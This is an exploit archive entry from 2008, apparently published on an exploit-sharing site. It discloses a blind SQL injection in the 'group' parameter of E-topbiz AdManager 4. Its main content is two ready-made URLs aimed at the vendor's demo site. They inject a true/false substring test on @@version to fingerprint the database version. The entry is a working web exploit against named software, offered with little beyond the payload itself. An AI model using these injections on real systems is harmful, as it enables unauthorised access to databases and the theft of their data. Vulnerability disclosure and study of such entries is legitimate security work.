id: 4190
date: 11/17/2008
title: E-topbiz AdManager 4 (group) Blind SQL Injection Vulnerability
author: Hussin X
cves: 

==============================================================
E-topbiz AdManager 4 (group) Blind SQL Injection Vulnerability
==============================================================


E-topbiz  AdManager 4 (group)  Blind SQL Injection Vulnerability
___________________________________

Author: Hussin X
___________________________________

script  : http://e-topbiz.com/oprema/pages/admanager4.php

Demo :
_______
true & false

http://e-topbiz.com/trafficdemos/admanager4/view.php?group=4+and%20substring(@@version,1,1)=4
http://e-topbiz.com/trafficdemos/admanager4/view.php?group=4+and%20substring(@@version,1,1)=5

Version = 4  :) 



#  0day.today [2023-03-26]  #